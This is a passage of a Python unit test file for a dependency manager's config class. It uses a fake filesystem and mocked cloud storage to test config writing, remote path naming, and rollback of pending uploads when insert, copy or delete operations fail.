self.new_remote_path = 'dependencies_folder/dep1_%s' % self.new_dep_hash
self.new_pending_upload = uploader.CloudStorageUploader(
self.new_bucket, self.new_remote_path, self.new_dep_path)
self.expected_new_backup_path = '.'.join([self.new_remote_path, 'old'])
self.new_expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "%s",' % self.new_dep_hash,
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.final_dep_path = 'path/to/final/dep'
self.fs.CreateFile(self.final_dep_path)
self.final_dep_hash = 'B34662F23B56B7F98601F'
self.final_bucket = 'bucket2'
self.final_remote_path = 'dep1_%s' % self.final_dep_hash
self.final_pending_upload = uploader.CloudStorageUploader(
self.final_bucket, self.final_remote_path, self.final_dep_path)
self.expected_final_backup_path = '.'.join([self.final_remote_path,
'old'])
self.final_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': self.new_dep_hash,
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': self.final_dep_hash,
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.final_expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "%s",' % self.new_dep_hash,
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "%s",' % self.final_dep_hash,
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
def tearDown(self):
self.tearDownPyfakefs()
def testCreateEmptyConfig(self):
expected_file_lines = ['{',
'"config_type": "BaseConfig",',
'"dependencies": {}',
'}']
config = dependency_manager.BaseConfig(self.file_path, writable=True)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual({}, config._config_data)
self.assertEqual(self.file_path, config._config_path)
def testCreateEmptyConfigError(self):
self.assertRaises(dependency_manager.EmptyConfigError,
dependency_manager.BaseConfig, self.file_path)
def testCloudStorageRemotePath(self):
dependency = 'dep_name'
cs_hash = self.new_dep_hash
cs_base_folder = 'dependency_remote_folder'
expected_remote_path = '%s/%s_%s' % (cs_base_folder, dependency, cs_hash)
remote_path = dependency_manager.BaseConfig._CloudStorageRemotePath(
dependency, cs_hash, cs_base_folder)
self.assertEqual(expected_remote_path, remote_path)
    cs_base_folder = None
    expected_remote_path = '%s_%s' % (dependency, cs_hash)
    remote_path = dependency_manager.BaseConfig._CloudStorageRemotePath(
        dependency, cs_hash, cs_base_folder)
    self.assertEqual(expected_remote_path, remote_path)
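    # Scheme pinned down here: with a base folder the remote path is
    # '<base_folder>/<dependency>_<hash>'; with a falsy base folder it is
    # just '<dependency>_<hash>', matching the upload fixtures in setUp.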
def testGetEmptyJsonDict(self):
expected_json_dict = {'config_type': 'BaseConfig',
'dependencies': {}}
json_dict = dependency_manager.BaseConfig._GetJsonDict()
self.assertEqual(expected_json_dict, json_dict)
def testGetNonEmptyJsonDict(self):
expected_json_dict = {"config_type": "BaseConfig",
"dependencies": self.dependencies}
json_dict = dependency_manager.BaseConfig._GetJsonDict(self.dependencies)
self.assertEqual(expected_json_dict, json_dict)
def testWriteEmptyConfigToFile(self):
expected_file_lines = ['{', '"config_type": "BaseConfig",',
'"dependencies": {}', '}']
self.assertFalse(os.path.exists(self.file_path))
dependency_manager.BaseConfig._WriteConfigToFile(self.file_path)
self.assertTrue(os.path.exists(self.file_path))
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
def testWriteNonEmptyConfigToFile(self):
self.assertFalse(os.path.exists(self.file_path))
dependency_manager.BaseConfig._WriteConfigToFile(self.file_path,
self.dependencies)
self.assertTrue(os.path.exists(self.file_path))
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsNoOp(self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config.ExecuteUpdateJobs())
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertNoCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
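  # This and the remaining failure tests all pin the same invariant: when
  # any cloud-storage step raises, ExecuteUpdateJobs must leave the config
  # dirty, keep every pending upload queued, and leave the file on disk
  # untouched, so the whole update can be retried safely.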
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnCopy(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertNoCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = []
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.expected_final_backup_path,
self.final_remote_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertFirstCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [True, False, True]
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnFirstCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [True, False, True]
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.return_value = True
uploader_cs_mock.Copy.side_effect = [
True, cloud_storage.CloudStorageError, True]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyNoCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True, False]
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path)]
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyNoCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True, False]
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessOnePendingDepNoCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = []
self.assertTrue(config.ExecuteUpdateJobs())
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessOnePendingDepCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
